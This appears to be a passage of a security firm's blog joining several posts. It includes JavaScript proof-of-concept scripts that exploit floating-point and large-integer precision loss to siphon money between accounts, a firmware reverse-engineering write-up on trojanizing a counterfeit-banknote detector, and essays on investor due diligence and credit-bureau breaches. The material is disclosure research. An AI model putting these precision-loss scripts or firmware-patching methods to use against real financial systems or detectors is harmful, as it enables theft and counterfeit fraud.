  print(” The balance of the bank accounts is:”);
  print(” Account 0: “+account[0]+” u$s”);
  print(” Account 1: “+account[1]+” u$s (profit)”);
  print(” Overall money: “+(account[0]+account[1]))
  print(“——————————————–“);
  if(typeof time !== ‘undefined’) {
     print(” Estimated daily profit: “+( (60*60*24/time) * account[1] ) );
     print(“——————————————–“);
  }
}
 
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // I will save my profit here 
}
 
account = new Array();
initial_deposit = 1000000;
profit = 0
print(“n1) Searching for the best profit”);
for(i = 0.000000000000000001; i < 0.1; i+=0.0000000000000000001) {
  reset_values();
  wire(1, i, 0); // I will transfer some cents from the account 0 to the account 1
  if(account[0]==initial_deposit && i>profit) {
    profit = i;
 //   print(“I can grab “+profit.toPrecision(21));
  } else {
    break;
  }
}
print(”   Found: “+profit.toPrecision(21));
print(“n2) Let’s start moving some money:”);
 
reset_values();
 
start = new Date().getTime() / 1000;
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) { 
    wire(1, profit, 0); // I will transfer some cents from the account 0 to the account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish-start);
}
 

The attack against it will have two phases. In the first phase, we will determine the maximum amount of decimals that we are allowed to take from an account before the language notices something is missing. This amount is related to the value from which we are we taking: the higher the value, the higher the amount of decimals. Our Bank Account 0 will have $1,000,000 USD to start with, and we will deposit our profits to a secondary Account 1:

 

Due to the decimals being silently shifted to Account 1, the bank now believes that it has more money than it actually has.

 

Another possibility to abuse the loss of precision is what happens when dealing with large numbers. The problem becomes visible when using at least 17 digits.
 

Now, the sample attack application will occur on a crypto currency, fakecoin.js:

 

 
// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if(account[withdraw]<0) {
    return 1; // Error! The account can not have a negative balance
  }
  return 0;
}
 
// This is used to print the balance
function print_balance(time) {
  print(“————————————————-“);
  print(” The general balance is:”);
  print(” Crypto coin:  “+crypto_coin);
  print(” Crypto value: “+crypto_value);
  print(” Crypto cash:  “+(account[0]*crypto_value)+” u$s”);
  print(” Account 0: “+account[0]+” coins”);
  print(” Account 1: “+account[1]+” coins”);
  print(” Overall value: “+( ( account[0] + account[1] ) * crypto_value )+” u$s”)
  print(“————————————————-“);
  if(typeof time !== ‘undefined’) {
     seconds_in_a_day = 60*60*24;
     print(” Estimated daily profit: “+( (seconds_in_a_day/time) * account[1] * crypto_value) +” u$s”);
     print(“————————————————-n”);
  }
}
 
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // profit
}
 
// My initial money
initial_deposit = 10000000000000000;
crypto_coin = “Fakecoin”
crypto_value = 0.00000000011;
 
// Here I have my bank accounts defined
account = new Array();
 
print(“n1) Searching for the best profit”);
profit = 0
for (j = 1; j < initial_deposit; j+=1) {
  reset_values();
  wire(1, j, 0); // I will transfer a few cents from the account 0 to the account 1
  if(account[0]==initial_deposit && j > profit) {
    profit = j;
  } else {
    break;
  }
}
print(”   Found: “+profit);
reset_values();
start = new Date().getTime() / 1000;
print(“n2) Let’s start moving some money”);
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) { 
    wire(1, profit, 0); // I will transfer my 29 cents from the account 0 to the account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish-start);
}
 
 
We will buy 10000000000000000 units of Fakecoin (with each coin valued at $0.00000000011 USD) for a total value of $1,100,000 USD. We will transfer one Fakecoin at the time from Account 0 to a second account that will hold our profits (Account 1). JavaScript will not notice the missing Fakecoin from Account 0, and will allow us to profit a total of approximately $2,300 USD per day:

Depending on the implementation, a hacker can used either float numbers or large numbers to generate money out of thin air.
 
Conclusion
In conclusion, programmers can avoid inexact floating point exceptions with some best practices:
  • If you rely on values that use decimal numbers, use specialized variables like BigInteger in Java.
  • Do not allow values larger than 16 digits to be stored in variables and truncate decimals, or
  • Use libraries that rely on quadruple precision (that is, twice the amount of regular precision).

 

INSIGHTS | February 6, 2014

An Equity Investor’s Due Diligence

Information technology companies constitute the core of many investment portfolios nowadays. With so many new startups popping up and some highly visible IPO’s and acquisitions by public companies egging things on, many investors are clamoring for a piece of the action and looking for new ways to rapidly qualify or disqualify an investment ; particularly so when it comes to hottest of hot investment areas – information security companies. 

Over the years I’ve found myself working with a number of private equity investment firms – helping them to review the technical merits and implications of products being brought to the market by new security startups. In most case’s it’s not until the B or C investment rounds that the money being sought by the fledgling company starts to get serious to the investors I know. If you’re going to be handing over money in the five to twenty million dollar range, you’re going to want to do your homework on both the company and the product opportunity. 

Over the last few years I’ve noted that a sizable number of private equity investment firms have built in to their portfolio review the kind of technical due diligence traditionally associated with the formal acquisition processes of Fortune-500 technology companies. It would seem to me that the $20,000 to $50,000 price tag for a quick-turnaround technical due diligence report is proving to be valuable investment in a somewhat larger investment strategy. 

When it comes to performing the technical due diligence on a startup (whether it’s a security or social media company for example), the process tends to require a mix of technical review and tapping past experiences if it’s to be useful, let alone actionable, to the potential investor. Here are some of the due diligence phases I recommend, and why:

    1. Vocabulary Distillation – For some peculiar reason new companies go out of their way to invent their own vocabulary as descriptors of their value proposition, or they go to great lengths to disguise the underlying processes of their technology with what can best be described as word-soup. For example, a “next-generation big-data derived heuristic determination engine” can more than adequately be summed up as “signature-based detection”. Apparently using the word “signature” in your technology description is frowned upon and the product management folks avoid the use the word (however applicable it may be). Distilling the word soup is a key component of being able to compare apples with apples.

 

    1. Overlapping Technology Review – Everyone wants to portray their technology as unique, ground-breaking, or next generation. Unfortunately, when it comes to the world of security, next year’s technology is almost certainly a progression of the last decade’s worth of invention. This isn’t necessarily bad, but it is important to determine the DNA and hereditary path of the “new” technology (and subcomponents of the product the start-up is bringing to market). Being able to filter through the word-soup of the first phase and determine whether the start-up’s approach duplicates functionality from IDS, AV, DLP, NAC, etc. is critical. I’ve found that many start-ups position their technology (i.e. advancements) against antiquated and idealized versions of these prior technologies. For example, simplifying desktop antivirus products down to signature engines – while neglecting things such as heuristic engines, local-host virtualized sandboxes, and dynamic cloud analysis.

 

    1. Code Language Review – It’s important to look at the languages that have been employed by the company in the development of their product. Popular rapid prototyping technologies like Ruby on Rails or Python are likely acceptable for back-end systems (as employed within a private cloud), but are potential deal killers to future acquirer companies that’ll want to integrate the technology with their own existing product portfolio (i.e. they’re not going to want to rewrite the product). Similarly, a C or C++ implementation may not offer the flexibility needed for rapid evolution or integration in to scalable public cloud platforms. Knowing which development technology has been used where and for what purpose can rapidly qualify or disqualify the strength of the company’s product management and engineering teams – and help orientate an investor on future acquisition or IPO paths.

 

    1. Security Code Review – Depending upon the size of the application and the due diligence period allowed, a partial code review can yield insight in to a number of increasingly critical areas – such as the stability and scalability of the code base (and consequently the maturity of the development processes and engineering team), the number and nature of vulnerabilities (i.e. security flaws that could derail the company publicly), and the effort required to integrate the product or proprietary technology with existing major platforms.

 

    1. Does it do what it says on the tin? – I hate to say it, but there’s a lot of snake oil being peddled nowadays. This is especially so for new enterprise protection technologies. In a nut-shell, this phase focuses on the claims being made by the marketing literature and product management teams, and tests both the viability and technical merits of each of them. Test harnesses are usually created to monitor how well the technology performs in the face of real threats – ranging from the samples provided by the companies user acceptance team (UAT) (i.e. the stuff they guarantee they can do), through to common hacking tools and tactics, and on to a skilled adversary with key domain knowledge.

 

  1. Product Penetration Test – Conducting a detailed penetration test against the start-up’s technology, product, or service delivery platform is always thoroughly recommended. These tests tend to unveil important information about the lifecycle-maturity of the product and the potential exposure to negative media attention due to exploitable flaws. This is particularly important to consumer-focused products and services because they are the most likely to be uncovered and exposed by external security researchers and hackers, and any public exploitation can easily set-back the start-up a year or more in brand equity alone. For enterprise products (e.g. appliances and cloud services) the hacker threat is different; the focus should be more upon what vulnerabilities could be introduced in to the customers environment and how much effort would be required to re-engineer the product to meet security standards.


Obviously there’s a lot of variety in the technical capabilities of the various private equity investment firms (and private investors). Some have people capable of sifting through the marketing hype and can discern the actual intellectual property powering the start-ups technology – but many do not. Regardless, in working with these investment firms and performing the technical due diligence on their potential investments, I’ve yet to encounter a situation where they didn’t “win” in some way or other. A particular favorite of mine is when, following a code review and penetration test that unveiled numerous serious vulnerabilities, the private equity firm was still intent on investing with the start-up but was able use the report to negotiate much better buy-in terms with the existing investors – gaining a larger percentage of the start-up for the same amount.

INSIGHTS | October 28, 2013

Hacking a counterfeit money detector for fun and non-profit

In Spain we have a saying “Hecha la ley, hecha la trampa” which basically means there will always be a way to circumvent a restriction. In fact, that is pretty much what hacking is all about.

 

It seems the idea of ‘counterfeiting’ appeared at the same time as legitimate money. The Wikipedia page for Counterfeit money  is a fascinating read that helps explain its effects.

 

http://en.wikipedia.org/wiki/Counterfeit_money

 

Nowadays every physical currency implements security measures to prevent counterfeiting. Some counterfeits can be detected with a naked eye, while others need specific devices or procedures to be identified. In order to help employees, counterfeit money detectors can be found in places that accept cash, including shops, malls, postal offices, banks, and gas stations.

 

Recently I took a look at one of these devices, Secureuro. I chose this device because it is widely used in Spain, and its firmware is freely available to download.
http://www.securytec.es/Informacion/clientes-de-secureuro

 

As usual, the first thing I did when approaching a static analysis of a device of this kind was to collect as much information as possible. We should look for anything that could help us to understand how the target works at all levels.

 

In this case I used the following sources:
Youtube
http://www.youtube.com/user/EuroSecurytec
I found some videos where the vendor details how to use the device. This let me analyze the behavior of the device, such as when an LED turns on, when a sound plays, and what messages are displayed. This knowledge is very helpful for understanding the underlying logic when analyzing the assembler later on.
 
 
Vendor Material
Technical specs, manuals, software, firmware … [1] [2] [3] See references.
The following document provides some insights into the device’s security http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf (resource no longer available)
Unfortunately, some of these claims are not completely true and others are simply false. It is possible to understand how Secureuro works; we can access the firmware and EEPROM without even needing hardware hacking. Also, there is no encryption system protecting the firmware.
Before we start discussing the technical details, I would like to clarify that we are not disclosing any trick that could help criminals to bypass the device ‘as is’. My intention is not to forge a banknote that could pass as legitimate, that is a criminal offense. My sole purpose is to explain how I identified the code behind the validation in order to create ‘trojanized’ firmware that accepts even a simple piece of paper as a valid currency. We are not exploiting a vulnerability in the device, just a design feature.
 
 
Analyzing the Firmware
This is the software that downloads the firmware into the device. The firmware file I downloaded from the vendor’s website contains 128K of data that will be flashed to the ATMEGA128 microcontroller. So I can directly load it into IDA, although I do not have access to the EEPROM yet.
 
Entry Points
A basic approach to dealing with this kind of firmware is to identify some elements or entry points that can leveraged to look for interesting pieces of code.
A minimal set includes:
 
Interruption Vector 
  1.  RESET == Main Entry Point
  2.  TIMERs
  3.  UARTs
  4.  SPI
Mnemonics
  1.  LPM (Load Program Memory)
  2.  SPM (Store Program Memory)
  3.  IN
  4.  OUT
Registers
 
ADCL: The ADC Data Register Low
ADCH: The ADC Data Register High
ADCSRA: ADC Control and Status Register
ADMUX: ADC Multiplexer Selection Register
ACSR: Analog Comparator Control and Status
UBRR0L: USART Baud Rate Register
UCSR0B: USART Control and Status Register
UCSR0A: USART Control and Status Register
UDR0: USART I/O Data Register
SPCR: SPI Control Register
SPSR: SPI Status Register
SPDR: SPI Data Register
EECR: EEPROM Control Register
EEDR: EEPROM Data Register
EEARL: EEPROM Address Register Low
EEARH: EEPROM Address Register High
OCR2: Output Compare Register
TCNT2: Timer/Counter Register
TCCR2: Timer/Counter Control Register
OCR1BL: Output Compare Register B Low
OCR1BH: Output Compare Register B High
OCR1AL: Output Compare Register A Low
OCR1AH: Output Compare Register A High
TCNT1L: Counter Register Low Byte
TCNT1H: Counter Register High Byte
TCCR1B: Timer/Counter1 Control Register B
TCCR1A: Timer/Counter1 Control Register A
OCR0: Timer/Counter0 Output Compare Register
TCNT0: Timer/Counter0
TCCR0: Timer/Counter Control Register
TIFR: Timer/Counter Interrupt Flag Register
TIMSK: Timer/Counter Interrupt Mask Register
Using this information, we should reconstruct some firmware functions to make it more reverse engineering friendly.
First, I try to identify the Main, following the flow at the RESET ISR. This step is pretty straightforward.
As an example of collecting information based on the mnemonics, we identify a function reading from flash memory, which is renamed to ‘readFromFlash‘. Its cross-references will provide valuable information.
By finding the references to the registers involved in EEPROM operations I come across the following functions ‘sub_CFC‘ and ‘sub_CF3‘:

 

The first routine reads from an arbitrary address in the EEPROM. The second routine writes to the EEPROM. I rename ‘sub_CFC‘ to ‘EEPROM_read‘ and ‘sub_CF3‘ to ‘EEPROM_write‘. These two functions are very useful, and provide us with important clues.
Now that our firmware looks like a little bit more friendly, we focus on the implemented functionalities. The documentation I collected states that this device has been designed to allow communications with a computer; therefore we should start by taking a look at the UART ISRs.
Tip: You can look for USART configuration registers UCSR0B, UBRR0… to see how it is configured. 
USART0_RX
It is definitely interesting, when receiving a ‘J’ (0x49) character it initializes the usual procedure to send data through the serial interface. It checks UDRE until it is ready and then sends outs bytes through UDR0. Going down a little bit I find the following piece of code
It is using the function to read from the EEPROM I identified earlier. It seems that if we want to understand what is going on we will have to analyze the other functions involved in this basic block, ‘sub_3CBB‘ and ‘sub_3C9F‘.
 
SUB_3CBB
This function is receiving two parameters, a length (r21:r20) and a memory address (r17:r16), and transmitting the n bytes located at the memory address through UDR0. It basically sends n bytes through the serial interface.
I rename ‘sub_3CBB’ to ‘dumpMemToSerial‘. So  this function being called in the following way: dumpMemToSerial(0xc20,9). What’s at address 0xc20? Apparently nothing that makes sense to dump out. I must be missing something here. What can we do? Let’s analyze the stub code the linker puts at the RESET ISR, just before the ‘Main’ entry point. That code usually contains routines for custom memory initialization.
Good enough, ‘sub_4D02‘ is a memory copy function from flash to SRAM. It uses LPM so it demonstrates how important it is to check specific mnemonics to discover juicy functions.
Now take a look at the parameters, at ROM:4041 it is copying 0x2BD bytes (r21:r20) from 0x80A1 (r31:r30) to 0xBC2 (r17:r16). If we go to 0x80A1 in the firmware file, we will find a string table!
Knowing that 0xBC2 has the string table above, my previous call makes much more sense now: dumpMemToSerial(0xc20,9) => 0xC20 – 0xBC2 = 0x5E
String Table (0x80A1) + 0x5E == “#RESETS”
The remaining function to analyze is ‘sub_3C9F‘, which is basically formatting a byte to its ASCII representation to send it out through the serial interface. I rename it ‘hex2ascii
So, according to the code, if we send ‘J’ to the device, we should be receiving some statistics. This matches what I read in the documentation.
http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf
Now this basic block seems much clearer. It is ‘printing’ some internal statistics.
“#RESETS: 000000” where 000000 is a three byte counter
(“BILLETES” means “BANKNOTES” in Spanish)
“#BILLETES: 000000 “
(“NO VALIDOS” means “INVALIDS” in Spanish)
#NO VALIDOS: 000000
Wait, hold on a second, the number of invalid banknotes is being stored in a three byte counter in the EEPROM, starting at position 0xE. Are you thinking what I’m thinking? We should look for the opposite operation. Where is that counter being incremented? That path would hopefully lead us to the part of code where a banknote is considered valid or invalid 🙂 Keep calm and ‘EEPROM_write’
Bingo!
Function ‘sub_1FEB’ (I rename it ‘incrementInvalid’) is incrementing the INVALID counter. Now I look for where it is being called.
incrementInvalid‘ is part of a branch, guess what’s in the other part?
In the left side of the branch, a variable I renamed ‘note_Value’, is being compared against 5 (5€) 0xA (10€). On the other hand, the right side of the branch leads to ‘incrementInvalid‘. Mission accomplished! We found the piece of code where the final validation is performed.
Without entering into details, but digging a little bit further by checking where ‘note_Value’ is being referenced, I easily narrow down the scope of the validation to two complex functions. The first one assigns a value of either 1 or 2 to ‘note_Value’ :
The second function takes into account this value to assigns the final value. When ‘note_Value’ is equal to 1, the possible values for the banknotes are: 5,10, and 20. Otherwise the values should be 50, 100, 200, or 500. Why?
I need to learn about Euro banknotes, so I take a look at the “Trainer’s guide to the Eurobanknotes and coins” from the European Central Bank http://www.ecb.europa.eu/euro/pdf/material/Trainer_A4_EN_SPECIMEN.pdf
Curious, this classification makes what I see in the code actually make sense. Maybe, only maybe, the first function is detecting the hologram type, and the second function is processing the remaining security features and finally assigning the value. The documentation from the vendor states:
Well, what about those six analogue signals? By checking for the registers involved in ADC operations we are able to identify an interesting function that I rename ‘getAnalogToDigital
This function receives the input pin from the ADC conversion as a parameter. As expected, it is invoked to complete the conversion of six different pins; inside a timer. The remaining three digital signals with information about the distances can also be obtained easily.
There are a lot of routines we could continue reconstructing: password, menu, configurations, timers, hidden/debug functionalities, but that is outside of the scope of this post. I merely wanted to identify a very specific functionality.
The last step was to buy the physical device. I modified the original firmware to accept our home-made IOActive currency, and…what do you think happened? Did it work? Watch the video to find it out 😉
The impact is obvious. An attacker with temporary physical access to the device could install customized firmware and cause the device to accept counterfeit money. Taking into account the types of places where these devices are usually deployed (shops, mall, offices, etc.)  this scenario is more than feasible.
Once again we see that when it comes to static analysis, collecting information about the target is as important as reverse engineering its code. Without the knowledge gained by reading all of those documents and watching the videos, reverse engineering would have been way more difficult.
I hope you find this useful in some way. I would be pleased if this post encourages you to research further or helps vendors understand the importance of building security measures into these types of devices.
References:
 
[1]http://www.inves.es/secureuro?p_p_id=56_INSTANCE_6CsS&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=detalleserie&p_p_col_count=1&_56_INSTANCE_6CsS_groupId=18412&_56_INSTANCE_6CsS_articleId=254592&_56_INSTANCE_6CsS_tabSelected=3&templateId=TPL_Detalle_Producto
[2] http://www.secureuro.com/secureuro/ingles/menuingles.htm#
[3] http://www.secureuro.com/secureuro/ingles/MANUALINGLES2006.pdf

 

[4] http://www.youtube.com/user/EuroSecurytec
INSIGHTS | March 14, 2013

Credit Bureau Data Breaches

This week saw some considerable surprise over how easy it is to acquire personal credit report information.  On Tuesday Bloomberg News led with a story of how “Top Credit Agencies Say Hackers Stole Celebrity Reports”, and yesterday there were many follow-up stories examining the hack. In one story I spoke with Rob Westervelt over at CRN regarding the problems credit reporting agencies face when authenticating the person for which the credit information applies and the additional problems they face securing the data in general (you can read the article “Equifax, Other Credit Bureaus Acknowledge Data Breach”).

 

Many stories have focused on one of two areas – the celebrities, or the ease of acquiring credit reports – but I wanted to touch upon some of the problems credit monitoring agencies face in verifying who has access to the data and how that fits in to the bigger problem of Internet-based authentication and the prevalence of personal-enough information.
The repeated failure of Internet portals tasked with providing access to personal credit report information stems from the data they have available that can be used for authentication, and the legislated requirement to make the data available in the first place.
Credit monitoring agencies are required to make the data accessible to all the individuals they hold reports on, however access to the credit report information is achieved through a wide variety of free and subscription portals – most of which are not associated with the credit monitoring bureaus in the first place.
In order to provide access to a particular individual’s credit report, the user must answer a few questions about themselves via one such portal. These questions, by necessity, are restricted to the kinds of data held (and tracked) by the credit reporting agencies – based off information garnered from other financial institutions. This information includes name, date of birth (or age), social security number, account numbers, account balances, account addresses, financial institutes that manages the accounts, and past requests for access to credit report information. While it sounds like a lot of information, it’s actually not a very rich source for authentication purposes – especially when some of the most important information that can uniquely identify the individual is relatively easy to acquire through other external and Internet-based sources.
Time Magazine’s article “Hackers Now Aiming For Your Credit Reports” of a year ago describes many of these limitations and where some of this information can be acquired. In essence though, the data is easy to mine from social media sites and household tax records; and a little bruteforce guessing can overcome the hurdle of it not already being in the public domain.
The question then becomes “what can the credit monitoring agencies do to protect the privacy of credit reports?”  Some commentators have recommended that individuals should provide a copy of state-issued identification documents – such as a drivers license or passport.
The submission of such a scanned document poses new problems for the credit monitoring agencies. First of all, this probably isn’t automatable on a large scale and they’ll need trained staff to review each of these documents. Secondly, there are plenty of tools and websites that allow you to generate a fake ID within seconds – and spotting the fakes will be extremely difficult without tying the authentication process to an external government authentication system (e.g. checking to see if the drivers license or passport number is legitimate). Thirdly, do you want the credit reporting agencies holding even more personal information about you?
This entire problem is getting worse – not just for the credit monitoring agencies, but for all online services. Authentication – especially “first time” authentication – is difficult at the best of times, but if you’re trying to do this using only data an organization has collected and holds themselves, it’s neigh on impossible given current hacking techniques.
I hate to say it, but there’s a very strong (and growing) requirement for governments to play a larger role in identity management. Someone somewhere needs to act as a trusted Internet passport authority – with “trusted” being the critical piece. I’ve seen the arguments that have been made for Facebook, Google, etc. being that identity management platform, but I respectively disagree. These commercial services aren’t identity management platforms, they’re authentication gateways. What is needed is the cyber-equivalent of a government-issued passport, with all the checks and balances that entails.
Even that is not perfect, but it would certainly be better than the crumby vendor-specific authentication systems and password recovery processes that currently plague the Internet.
In the meantime, don’t be surprised if you find your credit report and other personal information splattered over the Internet as part of some juvenile doxing attack.
— Gunter Ollmann, CTO IOActive Inc.